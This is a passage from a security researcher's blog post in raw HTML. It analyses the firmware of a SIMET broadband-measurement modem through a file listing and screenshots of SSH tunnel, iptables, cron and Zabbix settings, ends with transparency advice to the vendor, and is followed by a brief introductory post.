/usr/lib/libip6tc.so.0.0.0: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size<br />
/usr/lib/libjson-c.so.2: symbolic link to `libjson-c.so.2.0.1'<br />
/usr/lib/libjson-c.so.2.0.1: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size<br />
/usr/lib/libnfnetlink.so.0: symbolic link to `libnfnetlink.so.0.2.0'<br />
/usr/lib/libnfnetlink.so.0.2.0: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size<br />
/usr/lib/libpcap.so: symbolic link to `libpcap.so.1.1'<br />
/usr/lib/libpcap.so.1.1: symbolic link to `libpcap.so.1.1.1'<br />
/usr/lib/libpcap.so.1.1.1: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size<br />
/usr/lib/libssl.so.1.0.0: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size<br />
/usr/lib/libz.so: symbolic link to `libz.so.1.2.7'<br />
/usr/lib/libz.so.1: symbolic link to `libz.so.1.2.7'<br />
/usr/lib/libz.so.1.2.7: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size<br />
/usr/lib/uhttpd_lua.so: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size<br />
/usr/sbin/autossh: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted section header size<br />
/usr/sbin/hping3: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted section header size<br />
/usr/sbin/miniupnpd: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted section header size<br />
/usr/sbin/zabbix_agentd: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted section header size<br />
/usr/share/libiwinfo/hardware.txt: ASCII text<br />
/usr/share/miniupnpd/firewall.include: POSIX shell script, ASCII text executable<br />
/www/luci-static/bootstrap/cascade.css: assembler source, ASCII text<br />
/www/luci-static/bootstrap/favicon.ico: MS Windows icon resource - 1 icon<br />
/www/luci-static/bootstrap/html5.js: HTML document, ASCII text, with very long lines<br />
/www/simet/ceptro.png: PNG image data, 78 x 30, 8-bit colormap, non-interlaced<br />
/www/simet/cgi.png: PNG image data, 46 x 30, 8-bit colormap, non-interlaced<br />
/www/simet/nic.png: PNG image data, 47 x 25, 8-bit colormap, non-interlaced<br />
/www/simet/nonet.htm: UTF-8 Unicode text<br />
/www/simet/offline.jpg: JPEG image data, EXIF standard<br />
/www/simet/simetbox_minilogo.png: PNG image data, 111 x 23, 8-bit colormap, non-interlaced<br />
/www/simet/view_tab.css: assembler source, ASCII text<br />
/www/simet/view_tab.js: UTF-8 Unicode text, with very long lines</div>
<br />
<div style="text-align: left;">
<span style="font-family: inherit;">This simple technique is quite useful for forensic analysis of embedded devices, as you have a </span>white-list<span style="font-family: inherit;"> of known binaries and config files. </span>It's important to review both created and modified files, but I'll focus on the ones listed above. <span style="font-family: inherit;">Each binary and config file can be reviewed </span>separately so we can find interesting entries like:</div>
<div style="text-align: left;">
<br /></div>
<ul>
<li>SSH reverse tunnel settings and authorized_keys:</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-LqVdGt22JIQJy8Bm6PJRpcR3xegfWxnbKTez1SCTn4yHC0_uAczkhfKeBsdCF9eS314wu3kWPVkTSKvAAN44gNWLvmqe-_V2yBYPoKyEPBfU8mhPKP50z1TnAowCpX_SALRhnLVi13J3/s1600/p1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="539" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-LqVdGt22JIQJy8Bm6PJRpcR3xegfWxnbKTez1SCTn4yHC0_uAczkhfKeBsdCF9eS314wu3kWPVkTSKvAAN44gNWLvmqe-_V2yBYPoKyEPBfU8mhPKP50z1TnAowCpX_SALRhnLVi13J3/s640/p1.png" width="640" /></a></div>
<ul>
<li>Password changing scripts and Iptables rules:</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwegycVDEmcQ9XQU3OUXdwq-3aB4wvyKJZvE8Eh60xAQwIXo2z4e9HOrY8_kUfcKUIVaM5u9dJgNdImVTtw-zqL9R7pxL2gw0K9Yr3A9YTUbQ_hNHnKYJ1r-dselM9ZKLJAjolp1_uJF3e/s1600/p2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="385" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwegycVDEmcQ9XQU3OUXdwq-3aB4wvyKJZvE8Eh60xAQwIXo2z4e9HOrY8_kUfcKUIVaM5u9dJgNdImVTtw-zqL9R7pxL2gw0K9Yr3A9YTUbQ_hNHnKYJ1r-dselM9ZKLJAjolp1_uJF3e/s640/p2.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<ul>
<li style="text-align: left;">The device management starting page has an external iframe and users are identified by their MAC Address via HTTP GET requests:</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl2J7-Qbh0_y9ehyOyQbztl24bMc9hHYEw2FtUMRllWOTfIT3tPrzgCdu6PGqtGwpino2ojO9ykYq2wThWIpQcHntSIcU1iYLL9flphDvUX8xvvAAUQUG1-GSWzTOcxynohC9zi-Zpa7nD/s1600/p3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="385" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl2J7-Qbh0_y9ehyOyQbztl24bMc9hHYEw2FtUMRllWOTfIT3tPrzgCdu6PGqtGwpino2ojO9ykYq2wThWIpQcHntSIcU1iYLL9flphDvUX8xvvAAUQUG1-GSWzTOcxynohC9zi-Zpa7nD/s640/p3.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul>
<li>Cronjobs to test external access to port 25 and if the ISP allows IP spoofing:</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEif2u3gbACrlMdyuTZiZDwu7cKAc6U5uZ8x1HdZWJh4mVxw9w04HXh7KeQGwzgf_ECoTtUERAWezr86OY7ESD_J5jvVH6K8QhGdFW5uT2_9rSX_PMFt1sjxVUh3dpKRFbu31yfybeT3yQ8t/s1600/p5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="432" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEif2u3gbACrlMdyuTZiZDwu7cKAc6U5uZ8x1HdZWJh4mVxw9w04HXh7KeQGwzgf_ECoTtUERAWezr86OY7ESD_J5jvVH6K8QhGdFW5uT2_9rSX_PMFt1sjxVUh3dpKRFbu31yfybeT3yQ8t/s640/p5.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<ul>
<li><span style="text-align: left;">Script using hping3 to test if the user's ISP allows packet spoofing:</span></li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPqdjy1Rgap1Ri3gvP4gGYNxds111cM4HEabeXPLGEL-BkVacgdykBlrpaNu1aH8GV1uzil49J9U4ObFX4MqAUQgZ3U1EgorFtlaF97RpsdaX5q4wwq_Yu1uoxagIzV7P9JeocCD2ay44X/s1600/p4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="323" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPqdjy1Rgap1Ri3gvP4gGYNxds111cM4HEabeXPLGEL-BkVacgdykBlrpaNu1aH8GV1uzil49J9U4ObFX4MqAUQgZ3U1EgorFtlaF97RpsdaX5q4wwq_Yu1uoxagIzV7P9JeocCD2ay44X/s640/p4.png" width="640" /></a></div>
<ul>
<li>Zabbix agent settings:</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeeKlpwF7oPDONSoeF7Z9TcBwgk11vwBajh2DdepcLrblI7IA0lwf3ucyQ25_OGbOROcklGECti3zRArEk742IX8zTs8svTxBeM1pdRtsUUuTIAG8zlgpFkEy3ue-MjZoJ1W-gX7VkBmcn/s1600/p6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="339" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeeKlpwF7oPDONSoeF7Z9TcBwgk11vwBajh2DdepcLrblI7IA0lwf3ucyQ25_OGbOROcklGECti3zRArEk742IX8zTs8svTxBeM1pdRtsUUuTIAG8zlgpFkEy3ue-MjZoJ1W-gX7VkBmcn/s640/p6.png" width="640" /></a></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
As a quick advice to SIMET engineers, it would be nice to have HTTPS for those external queries, a bit more of transparency on what the equipment does internally, who's able to access it (whose authorized_keys are those?), what external IP addresses it communicates with and what information is being collected. Securing SOHO modems is very important, specially here in Brazil where lots of recent attacks were targeting these devices (<a href="https://twitter.com/assolini">Fabio Assolini's</a> talk "<a href="http://www.securelist.com/en/blog/208193852/The_tale_of_one_thousand_and_one_DSL_modems">The tale of one thousand and one DSL modems</a>" detailed this a year ago).</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="text-align: start;">On the next post I'll detail how to run those MIPS32 binaries on a virtual environment using QEMU and analyze some of the files with IDA Pro.</span></div>
Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com8tag:blogger.com,1999:blog-3296471108082693838.post-90544217137691170542013-08-24T18:57:00.003-03:002013-08-25T02:38:30.955-03:00Hello worldI just started this new Blog to talk about some personal projects, exploits and hacking in general. I'm a Brazilian Infosec guy interested on embedded device hacking (modems, routers etc), webapp security, console hacking and forensics. My twitter handle is <a href="https://twitter.com/bernardomr">@bernardomr</a>, feel free to ping me.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9PTcWZAi8sYYflp38F6ULC7lMLAyclrjRieo5yfBACXZrNsApRhjQA5CUNJIKw6SAg78kx6r2Y74aVu4t08K0ACORbHKrG-_nQZNZLemlgtSg5RXCjlmd0OIoux_yBBa3F0A9yq2Ik4D2/s1600/hworld.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9PTcWZAi8sYYflp38F6ULC7lMLAyclrjRieo5yfBACXZrNsApRhjQA5CUNJIKw6SAg78kx6r2Y74aVu4t08K0ACORbHKrG-_nQZNZLemlgtSg5RXCjlmd0OIoux_yBBa3F0A9yq2Ik4D2/s200/hworld.png" width="196" /></a></div>
<br />Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com0